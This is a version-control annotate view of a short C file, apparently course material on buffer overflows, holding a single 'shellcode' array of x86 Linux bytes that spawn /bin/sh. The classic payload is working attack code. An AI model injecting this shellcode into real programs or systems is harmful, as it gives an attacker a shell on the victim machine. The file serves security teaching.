progs/o1.c
author Christian Urban <urbanc@in.tum.de>
Thu, 15 Dec 2016 16:18:25 +0000
changeset 506 5446dc1fc992
parent 400 f05368d007dd
permissions -rw-r--r--
updated
Ignore whitespace changes - Everywhere: Within whitespace: At end of lines:
400
f05368d007dd updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
diff changeset
     1
char shellcode[] =
f05368d007dd updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
diff changeset
     2
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
f05368d007dd updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
diff changeset
     3
 "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
f05368d007dd updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
diff changeset
     4
 "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
f05368d007dd updated
Christian Urban <christian dot urban at kcl dot ac dot uk>
parents:
diff changeset
     5
 "\xff\xff/bin/sh";